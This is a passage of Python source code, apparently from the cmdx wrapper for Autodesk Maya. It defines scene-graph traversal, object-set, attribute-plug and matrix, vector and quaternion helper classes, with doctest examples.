if filter is not None and not mobject.hasFn(filter):
continue
if not type or op(type, getattr(Fn(mobject), other)):
node = cls(mobject)
if not contains or node.shape(type=contains):
if query is None:
yield node
elif isinstance(query, dict):
try:
if all(node[key] == value
for key, value in query.items()):
yield node
except ExistError:
continue
else:
if all(key in node for key in query):
yield node
def child(self,
type=None,
filter=om.MFn.kTransform,
query=None,
contains=None):
return next(self.children(type, filter, query, contains), None)
def shapes(self, type=None, query=None):
return self.children(type, kShape, query)
def shape(self, type=None):
return next(self.shapes(type), None)
def siblings(self, type=None, filter=om.MFn.kTransform):
parent = self.parent()
if parent is not None:
for child in parent.children(type=type, filter=filter):
if child != self:
yield child
def sibling(self, type=None, filter=None):
return next(self.siblings(type, filter), None)
# Module-level expression; this isn't evaluated
# at run-time, for that extra performance boost.
if hasattr(om, "MItDag"):
def descendents(self, type=None):
"""Faster and more efficient dependency graph traversal
Requires Maya 2017+
Example:
>>> grandparent = createNode("transform")
>>> parent = createNode("transform", parent=grandparent)
>>> child = createNode("transform", parent=parent)
>>> mesh = createNode("mesh", parent=child)
>>> it = grandparent.descendents(type=tMesh)
>>> next(it) == mesh
True
>>> next(it)
Traceback (most recent call last):
...
StopIteration
"""
type = type or om.MFn.kInvalid
typeName = None
# Support filtering by typeName
if isinstance(type, string_types):
typeName = type
type = om.MFn.kInvalid
it = om.MItDag(om.MItDag.kDepthFirst, om.MFn.kInvalid)
it.reset(
self._mobject,
om.MItDag.kDepthFirst,
om.MIteratorType.kMObject
)
it.next() # Skip self
while not it.isDone():
mobj = it.currentItem()
node = DagNode(mobj)
if typeName is None:
if not type or type == node._fn.typeId:
yield node
else:
if not typeName or typeName == node._fn.typeName:
yield node
it.next()
else:
def descendents(self, type=None):
"""Recursive, depth-first search; compliant with MItDag of 2017+
Example:
>>> grandparent = createNode("transform")
>>> parent = createNode("transform", parent=grandparent)
>>> child = createNode("transform", parent=parent)
>>> mesh = createNode("mesh", parent=child)
>>> it = grandparent.descendents(type=tMesh)
>>> next(it) == mesh
True
>>> next(it)
Traceback (most recent call last):
...
StopIteration
"""
def _descendents(node, children=None):
children = children or list()
children.append(node)
for child in node.children(filter=None):
_descendents(child, children)
return children
# Support filtering by typeName
typeName = None
if isinstance(type, str):
typeName = type
type = om.MFn.kInvalid
descendents = _descendents(self)[1:] # Skip self
for child in descendents:
if typeName is None:
if not type or type == child._fn.typeId:
yield child
else:
if not typeName or typeName == child._fn.typeName:
yield child
def descendent(self, type=om.MFn.kInvalid):
"""Singular version of :func:`descendents()`
A recursive, depth-first search.
.. code-block:: python
a
|
b---d
| |
c e
Example:
>>> _ = cmds.file(new=True, force=True)
>>> a = createNode("transform", "a")
>>> b = createNode("transform", "b", parent=a)
>>> c = createNode("transform", "c", parent=b)
>>> d = createNode("transform", "d", parent=b)
>>> e = createNode("transform", "e", parent=d)
>>> a.descendent() == a.child()
True
>>> list(a.descendents()) == [b, c, d, e]
True
>>> f = createNode("mesh", "f", parent=e)
>>> list(a.descendents(type="mesh")) == [f]
True
"""
return next(self.descendents(type), None)
def duplicate(self):
"""Return a duplicate of self"""
return self.__class__(self._fn.duplicate())
def clone(self, name=None, parent=None, worldspace=False):
"""Return a clone of self
A "clone" assignes the .outMesh attribute of a mesh node
to the `.inMesh` of the resulting clone.
Supports:
- mesh
Arguments:
name (str, optional): Name of newly created clone
parent (DagNode, optional): Parent to newly cloned node
worldspace (bool, optional): Translate output to worldspace
"""
if self.isA(kShape) and self.typeName == "mesh":
assert parent is not None, "mesh cloning requires parent argument"
name or parent.name() + "Clone"
with DagModifier() as mod:
mesh = mod.createNode("mesh", name, parent)
mesh["inMesh"] << self["outMesh"]
return mesh
else:
raise TypeError("Unsupported clone target: %s" % self)
def isLimited(self, typ):
return self._tfn.isLimited(typ)
def limitValue(self, typ):
return self._tfn.limitValue(typ)
def enableLimit(self, typ, state):
return self._tfn.enableLimit(typ, state)
def setLimit(self, typ, value):
return self._tfn.setLimit(typ, value)
if ENABLE_PEP8:
shortest_path = shortestPath
add_child = addChild
dag_path = dagPath
map_from = mapFrom
map_to = mapTo
is_limited = isLimited
limit_value = limitValue
set_limit = setLimit
enable_limit = enableLimit
bounding_box = boundingBox
# MFnTransform Limit Types
kRotateMaxX = 13
kRotateMaxY = 15
kRotateMaxZ = 17
kRotateMinX = 12
kRotateMinY = 14
kRotateMinZ = 16
kScaleMaxX = 1
kScaleMaxY = 3
kScaleMaxZ = 5
kScaleMinX = 0
kScaleMinY = 2
kScaleMinZ = 4
kShearMaxXY = 7
kShearMaxXZ = 9
kShearMaxYZ = 11
kShearMinXY = 6
kShearMinXZ = 8
kShearMinYZ = 10
kTranslateMaxX = 19
kTranslateMaxY = 21
kTranslateMaxZ = 23
kTranslateMinX = 18
kTranslateMinY = 20
kTranslateMinZ = 22
class ObjectSet(Node):
"""Support set-type operations on Maya sets
Caveats
1. MFnSet was introduced in Maya 2016, this class backports
that behaviour for Maya 2015 SP3
2. Adding a DAG node as a DG node persists its function set
such that when you query it, it'll return the name rather
than the path.
Therefore, when adding a node to an object set, it's important
that it is added either a DAG or DG node depending on what it it.
This class manages this automatically.
"""
@protected
def shortestPath(self):
return self.name(namespace=True)
def __iter__(self):
for member in self.members():
yield member
def add(self, member):
"""Add single `member` to set
Arguments:
member (cmdx.Node): Node to add
"""
return self.update([member])
def remove(self, members):
mobj = _encode1(self.name(namespace=True))
selectionList = om1.MSelectionList()
if not isinstance(members, (tuple, list)):
selectionList.add(members.path())
else:
for member in members:
selectionList.add(member.path())
fn = om1.MFnSet(mobj)
fn.removeMembers(selectionList)
def update(self, members):
"""Add several `members` to set
Arguments:
members (list): Series of cmdx.Node instances
"""
cmds.sets(list(map(str, members)), forceElement=self.path())
def clear(self):
"""Remove all members from set"""
mobj = _encode1(self.name(namespace=True))
fn = om1.MFnSet(mobj)
fn.clear()
def sort(self, key=lambda o: (o.typeName, o.path())):
"""Sort members of set by `key`
Arguments:
key (lambda): See built-in `sorted(key)` for reference
"""
members = sorted(
self.members(),
key=key
)
self.clear()
self.update(members)
def descendent(self, type=None):
"""Return the first descendent"""
return next(self.descendents(type), None)
def descendents(self, type=None):
"""Return hierarchy of objects in set"""
for member in self.members(type=type):
yield member
try:
for child in member.descendents(type=type):
yield child
except AttributeError:
continue
def flatten(self, type=None):
"""Return members, converting nested object sets into its members
Example:
>>> from maya import cmds
>>> _ = cmds.file(new=True, force=True)
>>> a = cmds.createNode("transform", name="a")
>>> b = cmds.createNode("transform", name="b")
>>> c = cmds.createNode("transform", name="c")
>>> cmds.select(a)
>>> gc = cmds.sets([a], name="grandchild")
>>> cc = cmds.sets([gc, b], name="child")
>>> parent = cmds.sets([cc, c], name="parent")
>>> mainset = encode(parent)
>>> sorted(mainset.flatten(), key=lambda n: n.name())
[|a, |b, |c]
"""
members = set()
def recurse(objset):
for member in objset:
if member.isA(om.MFn.kSet):
recurse(member)
elif type is not None:
if type == member.typeName:
members.add(member)
else:
members.add(member)
recurse(self)
return list(members)
def member(self, type=None):
"""Return the first member"""
return next(self.members(type), None)
def members(self, type=None):
op = operator.eq
other = "typeId"
if isinstance(type, string_types):
other = "typeName"
if isinstance(type, (tuple, list)):
op = operator.contains
for node in cmds.sets(self.name(namespace=True), query=True) or []:
node = encode(node)
if not type or op(type, getattr(node._fn, other)):
yield node
class AnimCurve(Node):
if __maya_version__ >= 2016:
def __init__(self, mobj, exists=True, modifier=None):
super(AnimCurve, self).__init__(mobj, exists, modifier)
self._fna = oma.MFnAnimCurve(mobj)
def key(self, time, value, interpolation=Linear):
time = om.MTime(time, om.MTime.uiUnit())
index = self._fna.find(time)
if index:
self._fna.setValue(index, value)
else:
self._fna.addKey(time, value, interpolation, interpolation)
def keys(self, times, values, interpolation=Linear):
times = map(lambda t: om.MTime(t, TimeUnit), times)
try:
self._fna.addKeys(times, values)
except RuntimeError:
# The error provided by Maya aren't very descriptive,
# help a brother out by look for common problems.
if not times:
log.error("No times were provided: %s" % str(times))
if not values:
log.error("No values were provided: %s" % str(values))
if len(values) != len(times):
log.error(
"Count mismatch; len(times)=%d, len(values)=%d" % (
len(times), len(values)
)
)
raise
class Plug(object):
def __abs__(self):
"""Return absolute value of plug
Example:
>>> node = createNode("transform")
>>> node["tx"] = -10
>>> abs(node["tx"])
10.0
"""
return abs(self.read())
def __bool__(self):
"""if plug:
Example:
>>> node = createNode("transform")
>>> node["tx"] = 10
>>> if node["tx"]:
... True
...
True
"""
return bool(self.read())
# Python 3
__nonzero__ = __bool__
def __float__(self):
"""Return plug as floating point value
Example:
>>> node = createNode("transform")
>>> float(node["visibility"])
1.0
"""
return float(self.read())
def __int__(self):
"""Return plug as int
Example:
>>> node = createNode("transform")
>>> int(node["visibility"])
1
"""
return int(self.read())
def __eq__(self, other):
"""Compare plug to `other`
Example:
>>> node = createNode("transform")
>>> node["visibility"] == True
True
>>> node["visibility"] == node["nodeState"]
False
>>> node["visibility"] != node["nodeState"]
True
"""
if isinstance(other, Plug):
other = other.read()
return self.read() == other
def __ne__(self, other):
if isinstance(other, Plug):
other = other.read()
return self.read() != other
def __neg__(self):
"""Negate unary operator
Example:
>>> node = createNode("transform")
>>> node["visibility"] = 1
>>> -node["visibility"]
-1
"""
return -self.read()
def __div__(self, other):
"""Python 2.x division
Example:
>>> node = createNode("transform")
>>> node["tx"] = 5
>>> node["ty"] = 2
>>> node["tx"] / node["ty"]
2.5
"""
if isinstance(other, Plug):
other = other.read()
return self.read() / other
def __truediv__(self, other):
"""Float division, e.g. self / other"""
if isinstance(other, Plug):
other = other.read()
return self.read() / other
def __add__(self, other):
"""Support legacy add string to plug
Note:
Adding to short name is faster, e.g. node["t"] + "x",
than adding to longName, e.g. node["translate"] + "X"
Example:
>>> node = createNode("transform")
>>> node["tx"] = 5
>>> node["translate"] + "X"
5.0
>>> node["t"] + "x"
5.0
>>> try:
... node["t"] + node["r"]
... except TypeError:
... error = True
...
>>> error
True
"""
if isinstance(other, str):
try:
# E.g. node["t"] + "x"
return self._node[self.name() + other]
except ExistError:
# E.g. node["translate"] + "X"
return self._node[self.name(long=True) + other]
raise TypeError(
"unsupported operand type(s) for +: 'Plug' and '%s'"
% type(other)
)
def __iadd__(self, other):
"""Support += operator, for .append()
Example:
>>> node = createNode("transform")
>>> node["myArray"] = Double(array=True)
>>> node["myArray"].append(1.0)
>>> node["myArray"].extend([2.0, 3.0])
>>> node["myArray"] += 5.1
>>> node["myArray"] += [1.1, 2.3, 999.0]
>>> node["myArray"][0]
1.0
>>> node["myArray"][6]
999.0
>>> node["myArray"][-1]
999.0
"""
if isinstance(other, (tuple, list)):
for entry in other:
self.append(entry)
else:
self.append(other)
return self
def __str__(self):
"""Return value as str
Example:
>>> node = createNode("transform")
>>> str(node["tx"])
'0.0'
"""
return str(self.read())
def __repr__(self):
return str(self.read())
def __rshift__(self, other):
"""Support connecting attributes via A >> B"""
self.connect(other)
def __lshift__(self, other):
"""Support connecting attributes via A << B"""
other.connect(self)
def __floordiv__(self, other):
"""Disconnect attribute via A // B
Example:
>>> nodeA = createNode("transform")
>>> nodeB = createNode("transform")
>>> nodeA["tx"] >> nodeB["tx"]
>>> nodeA["tx"] = 5
>>> nodeB["tx"] == 5
True
>>> nodeA["tx"] // nodeB["tx"]
>>> nodeA["tx"] = 0
>>> nodeB["tx"] == 5
True
"""
self.disconnect(other)
def __iter__(self):
"""Iterate over value as a tuple
Example:
>>> node = createNode("transform")
>>> node["translate"] = (0, 1, 2)
>>> for index, axis in enumerate(node["translate"]):
... assert axis == float(index)
... assert isinstance(axis, Plug)
...
>>> a = createNode("transform")
>>> a["myArray"] = Message(array=True)
>>> b = createNode("transform")
>>> c = createNode("transform")
>>> a["myArray"][0] << b["message"]
>>> a["myArray"][1] << c["message"]
>>> a["myArray"][0] in list(a["myArray"])
True
>>> a["myArray"][1] in list(a["myArray"])
True
>>> for single in node["visibility"]:
... print(single)
...
True
>>> node = createNode("wtAddMatrix")
>>> node["wtMatrix"][0]["weightIn"] = 1.0
"""
if self._mplug.isArray:
# getExisting... returns indices currently in use, which is
# important if the given array is *sparse*. That is, if
# indexes 5, 7 and 8 are used. If we simply call
# `evaluateNumElements` then it'll return a single number
# we could use to `range()` from, but that would only work
# if the indices were contiguous.
for index in self._mplug.getExistingArrayAttributeIndices():
yield self[index]
elif self._mplug.isCompound:
for index in range(self._mplug.numChildren()):
yield self[index]
else:
values = self.read()
# Facilitate single-value attributes
values = values if isinstance(values, (tuple, list)) else [values]
for value in values:
yield value
def __getitem__(self, index):
"""Read from child of array or compound plug
Arguments:
index (int): Logical index of plug (NOT physical, make note)
Example:
>>> _ = cmds.file(new=True, force=True)
>>> node = createNode("transform", name="mynode")
>>> node["translate"][0].read()
0.0
>>> node["visibility"][0]
Traceback (most recent call last):
...
TypeError: |mynode.visibility does not support indexing
>>> node["translate"][2] = 5.1
>>> node["translate"][2].read()
5.1
"""
cls = self.__class__
if isinstance(index, int):
# Support backwards-indexing
if index < 0:
index = self.count() - abs(index)
if self._mplug.isArray:
item = self._mplug.elementByLogicalIndex(index)
return cls(self._node, item, self._unit)
elif self._mplug.isCompound:
item = self._mplug.child(index)
return cls(self._node, item, self._unit)
else:
raise TypeError(
"%s does not support indexing" % self.path()
)
elif isinstance(index, string_types):
# Compound attributes have no equivalent
# to "MDependencyNode.findPlug()" and must
# be searched by hand.
if self._mplug.isCompound:
for child in range(self._mplug.numChildren()):
child = self._mplug.child(child)
_, name = child.name().rsplit(".", 1)
if index == name:
return cls(self._node, child)
else:
raise TypeError("'%s' is not a compound attribute"
% self.path())
raise ExistError("'%s' was not found" % index)
def __setitem__(self, index, value):
"""Write to child of array or compound plug
Example:
>>> node = createNode("transform")
>>> node["translate"][0] = 5
>>> node["tx"]
5.0
"""
self[index].write(value)
def __init__(self, node, mplug, unit=None, key=None, modifier=None):
"""A Maya plug
Arguments:
node (Node): Parent Node of plug
mplug (maya.api.OpenMaya.MPlug): Internal Maya plug
unit (int, optional): Unit with which to read plug
"""
assert isinstance(node, Node), "%s is not a Node" % node
self._node = node
self._mplug = mplug
self._unit = unit
self._cached = None
self._key = key
self._modifier = modifier
def plug(self):
return self._mplug
@property
def isArray(self):
return self._mplug.isArray
@property
def isCompound(self):
return self._mplug.isCompound
def append(self, value):
"""Add `value` to end of self, which is an array
Arguments:
value (object): If value, create a new entry and append it.
If cmdx.Plug, create a new entry and connect it.
Example:
>>> _ = cmds.file(new=True, force=True)
>>> node = createNode("transform", name="appendTest")
>>> node["myArray"] = Double(array=True)
>>> node["myArray"].append(1.0)
>>> node["notArray"] = Double()
>>> node["notArray"].append(2.0)
Traceback (most recent call last):
...
TypeError: "|appendTest.notArray" was not an array attribute
"""
if not self._mplug.isArray:
raise TypeError("\"%s\" was not an array attribute" % self.path())
index = self.count()
if isinstance(value, Plug):
self[index] << value
else:
self[index].write(value)
def extend(self, values):
"""Append multiple values to the end of an array
Arguments:
values (tuple): If values, create a new entry and append it.
If cmdx.Plug's, create a new entry and connect it.
Example:
>>> node = createNode("transform")
>>> node["myArray"] = Double(array=True)
>>> node["myArray"].extend([1.0, 2.0, 3.0])
>>> node["myArray"][0]
1.0
>>> node["myArray"][-1]
3.0
"""
for value in values:
self.append(value)
def count(self):
return self._mplug.evaluateNumElements()
def asDouble(self, time=None):
"""Return plug as double (Python float)
Example:
>>> node = createNode("transform")
>>> node["translateX"] = 5.0
>>> node["translateX"].asDouble()
5.0
"""
if time is not None:
return self._mplug.asDouble(DGContext(time=time))
return self._mplug.asDouble()
def asMatrix(self, time=None):
"""Return plug as MatrixType
Example:
>>> node1 = createNode("transform")
>>> node2 = createNode("transform", parent=node1)
>>> node1["translate"] = (0, 5, 0)
>>> node2["translate"] = (0, 5, 0)
>>> plug1 = node1["matrix"]
>>> plug2 = node2["worldMatrix"][0]
>>> mat1 = plug1.asMatrix()
>>> mat2 = plug2.asMatrix()
>>> mat = mat1 * mat2
>>> tm = TransformationMatrix(mat)
>>> list(tm.translation())
[0.0, 15.0, 0.0]
"""
if time is not None:
context = DGContext(time=time)
obj = self._mplug.asMObject(context)
else:
obj = self._mplug.asMObject()
return om.MFnMatrixData(obj).matrix()
def asTransformationMatrix(self, time=None):
"""Return plug as TransformationMatrix
Example:
>>> node = createNode("transform")
>>> node["translateY"] = 12
>>> node["rotate"] = 1
>>> tm = node["matrix"].asTm()
>>> map(round, tm.rotation())
[1.0, 1.0, 1.0]
>>> list(tm.translation())
[0.0, 12.0, 0.0]
"""
return TransformationMatrix(self.asMatrix(time))
# Alias
asTm = asTransformationMatrix
def asEulerRotation(self, order=kXYZ, time=None):
value = self.read(time=time)
return om.MEulerRotation(value, order)
def asQuaternion(self, time=None):
value = self.read(time=time)
value = Euler(value).asQuaternion()
def asVector(self, time=None):
assert self.isArray or self.isCompound, "'%s' not an array" % self
return Vector(self.read(time=time))
@property
def connected(self):
"""Return whether or not this attribute is connected (to anything)"""
return self.connection() is not None
@property
def locked(self):
return self._mplug.isLocked
@locked.setter
def locked(self, value):
"""Lock attribute"""
elements = (
self
if self.isArray or self.isCompound
else [self]
)
# Use setAttr in place of MPlug.isKeyable = False, as that
# doesn't persist the scene on save if the attribute is dynamic.
for el in elements:
cmds.setAttr(el.path(), lock=value)
def lock(self):
self.locked = True
def unlock(self):
self.locked = False
@property
def channelBox(self):
"""Is the attribute visible in the Channel Box?"""
if self.isArray or self.isCompound:
return all(
plug._mplug.isChannelBox
for plug in self
)
else:
return self._mplug.isChannelBox
@channelBox.setter
def channelBox(self, value):
elements = (
self
if self.isArray or self.isCompound
else [self]
)
# Use setAttr in place of MPlug.isChannelBox = False, as that
# doesn't persist the scene on save if the attribute is dynamic.
for el in elements:
cmds.setAttr(el.path(), keyable=value, channelBox=value)
@property
def keyable(self):
"""Is the attribute keyable?"""
if self.isArray or self.isCompound:
return all(
plug._mplug.isKeyable
for plug in self
)
else:
return self._mplug.isKeyable
@keyable.setter
def keyable(self, value):
elements = (
self
if self.isArray or self.isCompound
else [self]
)
# Use setAttr in place of MPlug.isKeyable = False, as that
# doesn't persist the scene on save if the attribute is dynamic.
for el in elements:
cmds.setAttr(el.path(), keyable=value)
@property
def hidden(self):
return om.MFnAttribute(self._mplug.attribute()).hidden
@hidden.setter
def hidden(self, value):
pass
def hide(self):
"""Hide attribute from channel box
Note: An attribute cannot be hidden from the channel box
and keyable at the same time. Therefore, this method
also makes the attribute non-keyable.
Supports array and compound attributes too.
"""
self.keyable = False
self.channelBox = False
def lockAndHide(self):
self.lock()
self.hide()
@property
def default(self):
"""Return default value of plug"""
return _plug_to_default(self._mplug)
def reset(self):
"""Restore plug to default value"""
if self.writable:
self.write(self.default)
else:
raise TypeError(
"Cannot reset non-writable attribute '%s'" % self.path()
)
@property
def writable(self):
"""Can the user write to this attribute?
Convenience for combined call to `plug.connected`
and `plug.locked`.
Example:
>> if node["translateX"].writable:
.. node["translateX"] = 5
"""
return not any([self.connected, self.locked])
def show(self):
"""Show attribute in channel box
Note: An attribute can be both visible in the channel box
and non-keyable, therefore, unlike :func:`hide()`, this
method does not alter the keyable state of the attribute.
"""
self.channelBox = True
def type(self):
"""Retrieve API type of plug as string
Example:
>>> node = createNode("transform")
>>> node["translate"].type()
'kAttribute3Double'
>>> node["translateX"].type()
'kDoubleLinearAttribute'
"""
return self._mplug.attribute().apiTypeStr
def path(self):
return "%s.%s" % (
self._node.path(), self._mplug.partialName(
includeNodeName=False,
useLongNames=True,
useFullAttributePath=True
)
)
def name(self, long=False):
return self._mplug.partialName(
includeNodeName=False,
useLongNames=long,
useFullAttributePath=True
)
def read(self, unit=None, time=None):
"""Read attribute value
Arguments:
unit (int, optional): Unit with which to read plug
time (float, optional): Time at which to read plug
Example:
>>> node = createNode("transform")
>>> node["ty"] = 100.0
>>> node["ty"].read()
100.0
>>> node["ty"].read(unit=Meters)
1.0
"""
unit = unit if unit is not None else self._unit
context = None if time is None else DGContext(time=time)
try:
value = _plug_to_python(
self._mplug,
unit=unit,
context=context
)
# Store cached value
self._node._state["values"][self._key, unit] = value
return value
except RuntimeError:
raise
except TypeError:
# Expected errors
log.error("'%s': failed to read attribute" % self.path())
raise
def write(self, value):
if not getattr(self._modifier, "isDone", True):
return self._modifier.setAttr(self, value)
try:
_python_to_plug(value, self)
self._cached = value
except RuntimeError:
raise
except TypeError:
log.error("'%s': failed to write attribute" % self.path())
raise
def connect(self, other, force=True):
if not getattr(self._modifier, "isDone", True):
return self._modifier.connect(self, other, force)
mod = om.MDGModifier()
if force:
# Disconnect any plug connected to `other`
for plug in other._mplug.connectedTo(True, False):
mod.disconnect(plug, other._mplug)
mod.connect(self._mplug, other._mplug)
mod.doIt()
def disconnect(self, other=None, source=True, destination=True):
"""Disconnect self from `other`
Arguments:
other (Plug, optional): If none is provided, disconnect everything
Example:
>>> node1 = createNode("transform")
>>> node2 = createNode("transform")
>>> node2["tx"].connection() is None
True
>>> node2["ty"].connection() is None
True
>>>
>>> node2["tx"] << node1["tx"]
>>> node2["ty"] << node1["ty"]
>>> node2["ty"].connection() is None
False
>>> node2["tx"].connection() is None
False
>>>
>>> node2["tx"].disconnect(node1["tx"])
>>> node2["ty"].disconnect()
>>> node2["tx"].connection() is None
True
>>> node2["ty"].connection() is None
True
"""
other = getattr(other, "_mplug", None)
if not getattr(self._modifier, "isDone", True):
mod = self._modifier
mod.disconnect(self._mplug, other, source, destination)
# Don't do it, leave that to the parent context
else:
mod = DGModifier()
mod.disconnect(self._mplug, other, source, destination)
mod.doIt()
def connections(self,
type=None,
source=True,
destination=True,
plugs=False,
unit=None):
"""Yield plugs connected to self
Arguments:
type (int, optional): Only return nodes of this type
source (bool, optional): Return source plugs,
default is True
destination (bool, optional): Return destination plugs,
default is True
plugs (bool, optional): Return connected plugs instead of nodes
unit (int, optional): Return plug in this unit, e.g. Meters
Example:
>>> _ = cmds.file(new=True, force=True)
>>> a = createNode("transform", name="A")
>>> b = createNode("multDoubleLinear", name="B")
>>> a["ihi"] << b["ihi"]
>>> a["ihi"].connection() == b
True
>>> b["ihi"].connection() == a
True
>>> a["ihi"]
2
"""
op = operator.eq
other = "typeId"
if isinstance(type, string_types):
other = "typeName"
if isinstance(type, (tuple, list)):
op = operator.contains
for plug in self._mplug.connectedTo(source, destination):
mobject = plug.node()
node = Node(mobject)
if not type or op(type, getattr(node._fn, other)):
yield Plug(node, plug, unit) if plugs else node
def connection(self,
type=None,
source=True,
destination=True,
plug=False,
unit=None):
"""Return first connection from :func:`connections()`"""
return next(self.connections(type=type,
source=source,
destination=destination,
plugs=plug,
unit=unit), None)
def source(self, unit=None):
cls = self.__class__
plug = self._mplug.source()
node = Node(plug.node())
if not plug.isNull:
return cls(node, plug, unit)
def node(self):
return self._node
if ENABLE_PEP8:
as_double = asDouble
as_matrix = asMatrix
as_transformation_matrix = asTransformationMatrix
as_euler_rotation = asEulerRotation
as_quaternion = asQuaternion
as_vector = asVector
channel_box = channelBox
lock_and_hide = lockAndHide
class TransformationMatrix(om.MTransformationMatrix):
"""A more readable version of Maya's MTransformationMatrix
Added:
- Takes tuples/lists in place of MVector and other native types
- Support for multiplication
- Support for getting individual axes
- Support for direct access to the quaternion
Arguments:
matrix (Matrix, TransformationMatrix, optional): Original constructor
translate (tuple, Vector, optional): Initial translate value
rotate (tuple, Vector, optional): Initial rotate value
scale (tuple, Vector, optional): Initial scale value
"""
def __init__(self, matrix=None, translate=None, rotate=None, scale=None):
# It doesn't like being handed `None`
args = [matrix] if matrix is not None else []
super(TransformationMatrix, self).__init__(*args)
if translate is not None:
self.setTranslation(translate)
if rotate is not None:
self.setRotation(rotate)
if scale is not None:
self.setScale(scale)
def __mul__(self, other):
if isinstance(other, (tuple, list)):
other = Vector(*other)
if isinstance(other, om.MVector):
p = self.translation()
q = self.quaternion()
return p + q * other
elif isinstance(other, om.MMatrix):
return type(self)(self.asMatrix() * other)
elif isinstance(other, om.MTransformationMatrix):
return type(self)(self.asMatrix() * other.asMatrix())
else:
raise TypeError(
"unsupported operand type(s) for *: '%s' and '%s'"
% (type(self).__name__, type(other).__name__)
)
@property
def xAxis(self):
return self.quaternion() * Vector(1, 0, 0)
@property
def yAxis(self):
return self.quaternion() * Vector(0, 1, 0)
@property
def zAxis(self):
return self.quaternion() * Vector(0, 0, 1)
def translateBy(self, vec, space=None):
space = space or sTransform
if isinstance(vec, (tuple, list)):
vec = Vector(vec)
return super(TransformationMatrix, self).translateBy(vec, space)
def rotateBy(self, rot, space=None):
"""Handle arguments conveniently
- Allow for optional `space` argument
- Automatically convert tuple to Vector
Arguments:
rot (Vector, Quaternion): Rotation to add
"""
space = space or sTransform
if isinstance(rot, (tuple, list)):
rot = Vector(rot)
if isinstance(rot, om.MVector):
rot = EulerRotation(rot)
return super(TransformationMatrix, self).rotateBy(rot, space)
def quaternion(self):
"""Return transformation matrix as a Quaternion"""
return Quaternion(self.rotation(asQuaternion=True))
def rotatePivot(self, space=None):
"""This method does not typically support optional arguments"""
space = space or sTransform
return super(TransformationMatrix, self).rotatePivot(space)
def translation(self, space=None):
"""This method does not typically support optional arguments"""
space = space or sTransform
return super(TransformationMatrix, self).translation(space)
def setTranslation(self, trans, space=None):
if isinstance(trans, Plug):
trans = trans.as_vector()
if isinstance(trans, (tuple, list)):
trans = Vector(*trans)
space = space or sTransform
return super(TransformationMatrix, self).setTranslation(trans, space)
def scaleBy(self, space=None):
"""This method does not typically support optional arguments"""
space = space or sTransform
return Vector(super(TransformationMatrix, self).scale(space))
def setScale(self, seq, space=None):
"""This method does not typically support optional arguments"""
if isinstance(seq, Plug):
seq = seq.as_vector()
if isinstance(seq, (tuple, list)):
seq = Vector(*seq)
space = space or sTransform
return super(TransformationMatrix, self).setScale(seq, space)
def rotation(self, asQuaternion=False):
return super(TransformationMatrix, self).rotation(asQuaternion)
def setRotation(self, rot):
"""Interpret three values as an euler rotation"""
if isinstance(rot, Plug):
rot = rot.as_vector()
if isinstance(rot, (tuple, list)):
try:
rot = Vector(rot)
except ValueError:
traceback.print_exc()
raise ValueError(
"I tried automatically converting your "
"tuple to a Vector, but couldn't.."
)
if isinstance(rot, Vector):
rot = EulerRotation(rot)
return super(TransformationMatrix, self).setRotation(rot)
def asMatrix(self):
return MatrixType(super(TransformationMatrix, self).asMatrix())
def asMatrixInverse(self):
return MatrixType(super(TransformationMatrix, self).asMatrixInverse())
# A more intuitive alternative
translate = translateBy
rotate = rotateBy
scale = scaleBy
if ENABLE_PEP8:
x_axis = xAxis
y_axis = yAxis
z_axis = zAxis
translate_by = translateBy
rotate_by = rotateBy
set_translation = setTranslation
set_rotation = setRotation
set_scale = setScale
as_matrix = asMatrix
as_matrix_inverse = asMatrixInverse
class MatrixType(om.MMatrix):
def __call__(self, *item):
"""Native API 2.0 MMatrix does not support indexing
API 1.0 however *does*, except only for elements
and not rows. Screw both of those, indexing isn't hard.
Arguments:
item (int, tuple): 1 integer for row, 2 for element
Identity/default matrix:
[[1.0, 0.0, 0.0, 0.0]]
[[0.0, 1.0, 0.0, 0.0]]
[[0.0, 0.0, 1.0, 0.0]]
[[0.0, 0.0, 0.0, 1.0]]
Example:
>>> m = MatrixType()
>>> m(0, 0)
1.0
>>> m(0, 1)
0.0
>>> m(1, 1)
1.0
>>> m(2, 1)
0.0
>>> m(3, 3)
1.0
>>>
>>> m(0)
(1.0, 0.0, 0.0, 0.0)
"""
if len(item) == 1:
return self.row(*item)
elif len(item) == 2:
return self.element(*item)
else:
raise ValueError(
"Must provide either 1 or 2 coordinates, "
"for row and element respectively"
)
def __mul__(self, other):
return type(self)(super(MatrixType, self).__mul__(other))
def __div__(self, other):
return type(self)(super(MatrixType, self).__div__(other))
def inverse(self):
return type(self)(super(MatrixType, self).inverse())
def row(self, index):
values = tuple(self)
return (
values[index * 4 + 0],
values[index * 4 + 1],
values[index * 4 + 2],
values[index * 4 + 3]
)
def element(self, row, col):
values = tuple(self)
return values[row * 4 + col % 4]
# Alias
Transformation = TransformationMatrix
Tm = TransformationMatrix
Mat = MatrixType
Mat4 = MatrixType
Matrix4 = MatrixType
class Vector(om.MVector):
"""Maya's MVector
Example:
>>> vec = Vector(1, 0, 0)
>>> vec * Vector(0, 1, 0) # Dot product
0.0
>>> vec ^ Vector(0, 1, 0) # Cross product
maya.api.OpenMaya.MVector(0, 0, 1)
"""
def __add__(self, value):
if isinstance(value, (int, float)):
return type(self)(
self.x + value,
self.y + value,
self.z + value,
)
return super(Vector, self).__add__(value)
def __iadd__(self, value):
if isinstance(value, (int, float)):
return type(self)(
self.x + value,
self.y + value,
self.z + value,
)
return super(Vector, self).__iadd__(value)
# Alias, it can't take anything other than values
# and yet it isn't explicit in its name.
Vector3 = Vector
class Point(om.MPoint):
"""Maya's MPoint"""
class BoundingBox(om.MBoundingBox):
"""Maya's MBoundingBox"""
def volume(self):
return self.width * self.height * self.depth
class Quaternion(om.MQuaternion):
"""Maya's MQuaternion
Example:
>>> q = Quaternion(0, 0, 0, 1)
>>> v = Vector(1, 2, 3)
>>> isinstance(q * v, Vector)
True
"""
def __mul__(self, other):
if isinstance(other, (tuple, list)):
other = Vector(*other)
if isinstance(other, om.MVector):
return Vector(other.rotateBy(self))
else:
return super(Quaternion, self).__mul__(other)
def lengthSquared(self):
return (
self.x * self.x +
self.y * self.y +
self.z * self.z +
self.w * self.w
)
def length(self):
return math.sqrt(self.lengthSquared())
def isNormalised(self, tol=0.0001):
return abs(self.length() - 1.0) < tol
# Alias
Quat = Quaternion
def twistSwingToQuaternion(ts):
"""Convert twist/swing1/swing2 rotation in a Vector into a quaternion
Arguments:
ts (Vector): Twist, swing1 and swing2
"""
t = tan(ts.x * 0.25)
s1 = tan(ts.y * 0.25)
s2 = tan(ts.z * 0.25)
